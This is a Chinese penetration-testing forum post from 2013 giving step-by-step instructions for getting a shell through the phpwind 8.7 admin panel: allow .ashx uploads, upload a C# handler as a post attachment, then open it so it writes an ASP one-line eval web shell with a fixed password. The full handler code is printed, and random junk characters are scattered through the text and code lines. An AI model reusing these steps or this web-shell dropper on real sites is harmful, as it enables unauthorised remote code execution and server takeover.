中国网络渗透测试联盟

标题: phpwind 8.7 后台拿shell [打印本页]

---

作者: admin    时间: 2013-7-26 12:41
标题: phpwind 8.7 后台拿shell
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
, p) @7 Y6 E" x, R7 W# `
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
. x$ C# v. u- N& F- P" k# S  U
8 M; f5 J6 t3 ]! C发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
  ]% J4 T0 g; N: ?5 v
5 o& |/ w1 @( e( ]( D, t然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx

, f* F& o4 B7 c2 T% G3 z8 ^3 v打开之后空白 会在目录底下生成r00ts.asp 密码r00ts

下面是代码:

<%@ WebHandler Language="C#"Class="Handler" %>
using System;
using System.Web;
using System.IO;
0 g/ C& n2 C9 w' spublic class Handler : IHttpHandler {
: N0 L% B2 x# \% q. {! M- A% opublic void ProcessRequest (HttpContext context) {
: g2 B+ |7 n! Z) C6 }/ w6 ucontext.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
% R+ W# y- p, O. g6 [# ifile1.Write("<%eval request(\"r00ts\")%>");
% K* `; C+ u3 ufile1.Flush();
file1.Close();
}
public bool IsReusable {
& v3 Y  q6 u; m. j$ {. Pget {
return false;
}
}
}
8 Z# J9 o, \  u5 \; R2 R  c4 ]

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2